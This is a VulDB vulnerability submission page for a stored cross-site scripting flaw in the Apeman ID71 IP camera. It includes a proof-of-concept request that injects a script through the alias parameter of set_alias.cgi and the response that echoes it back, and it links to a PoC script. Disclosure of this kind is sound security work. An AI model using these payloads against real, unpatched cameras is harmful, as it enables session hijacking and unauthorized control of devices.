Submeter #668771: Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scriptinginformação

Título	Apeman IP CAMERA Model ID71 appversion: EN75.8.53.20 Cross Site Scripting
Descrição	The camera’s web interface does not properly encode the user-supplied `alias` value before embedding it into JavaScript. When `alias` is set via `set_alias.cgi`, it is stored and later emitted by `get_status.cgi` as a JavaScript string without context-appropriate encoding. An authenticated attacker can inject arbitrary JavaScript that will execute in the browser of any user viewing pages that consume this variable, enabling session hijacking and unauthorized actions within the victim’s session. To store the XSS we can use the following request: # Request GET /set_alias.cgi?alias=%3Cscript%3Ealert(1)%3C%2Fscript%3E&next_url=alias.htm&loginuse=admin&loginpas=XXXXXXXX HTTP/1.1 Host: 192.168.1.151:53370 To retrieve the stored value use the following request: # Request GET /get_status.cgi HTTP/1.1 Host: 192.168.1.151:53370 ..... # Response: HTTP/1.1 200 OK Date: Sat Oct 4 11:52:04 2025 Server: GoAhead-Webs var alias="<script>alert(1)</script>"; var deviceid="VSTD1744XXXXX"; var sys_ver="x.x.x.x"; var app_version="EN75.8.53.20"; var oem_id="XXXX"; var now=17595XXXXXX; ...SNIP.... Impact - Confidentiality: High — theft of session tokens, credentials, and configuration data - Integrity: High — arbitrary actions in the victim’s authenticated context (change settings, add users) Additional information and images: https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/XSS-Info.md Vendor status: The vendor APEMAN no longer sells this camera model. It appears to have been discontinued or rebranded. Attempts to contact the vendor were unsuccessful. From my research, it seems that Apeman no longer sells or officially supports security cameras, including the Model ID71. Their current official website (https://apemans.com) focuses exclusively on projectors and dashcams, with no mention of their legacy IP camera line. Because of this, there is no longer an active vendor website or support portal that references the ID71 camera. Historical product information is only available through third-party sources (e.g., archived sales pages, second-hand listings, and user forums).
Fonte	⚠️ https://github.com/juliourena/APEMAN-Camera-PoCs/blob/main/XSS/apeman_id71_xss_poc.py
Utilizador	juliourena (UID 90207)
Submissão	04/10/2025 15h01 (há 8 meses)
Moderação	16/10/2025 13h29 (12 days later)
Estado	Aceite
Entrada VulDB	328797 [Apeman ID71 EN75.8.53.20 /set_alias.cgi alias Script de Site Cruzado]
Pontos	20

◂ Voltar Visão Geral Próximo ▸

Interested in the pricing of exploits?

See the underground prices here!